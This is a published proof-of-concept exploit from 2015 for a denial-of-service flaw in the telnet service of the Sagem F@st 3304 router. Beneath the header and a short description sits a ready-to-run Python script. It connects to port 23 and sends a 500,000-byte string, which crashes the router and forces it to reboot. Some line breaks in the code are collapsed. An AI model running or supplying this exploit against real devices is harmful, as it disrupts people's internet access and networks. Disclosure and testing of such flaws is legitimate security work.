# Title: Sagem F@st 3304-V2 Telnet Crash POC# Vendor : http://www.sagemcom.com# Severity : High# Tested Router: Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)# Date : 2015-03-08# Author : Loudiyi Mohamed# Contact: Loudiyi.2010@gmail.com# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603# Vulnerability description:#==========================#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.#After the exploit is sent, the telnet service will crash and the router will reboot automatically.#Usage: python SagemDos.py "IP address"# Code#========================================================================#!/usr/bin/pythonimport socket
import sys
print("######################################")print("#DOS Sagem F@st3304 v1-v2#")print("# ----------#")print("# BYLOUDIYI MOHAMED#")print("#####################################")if(len(sys.argv)<2):print"Usage: %s <host> "% sys.argv[0]print"Example: %s 192.168.1.1 "% sys.argv[0]
exit(0)print"\nSending evil buffer..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)try:
s.connect((sys.argv[1],23))buffer="X"*500000
s.send(buffer)except:print"Could not connect to Sagem Telnet!"#========================================================================
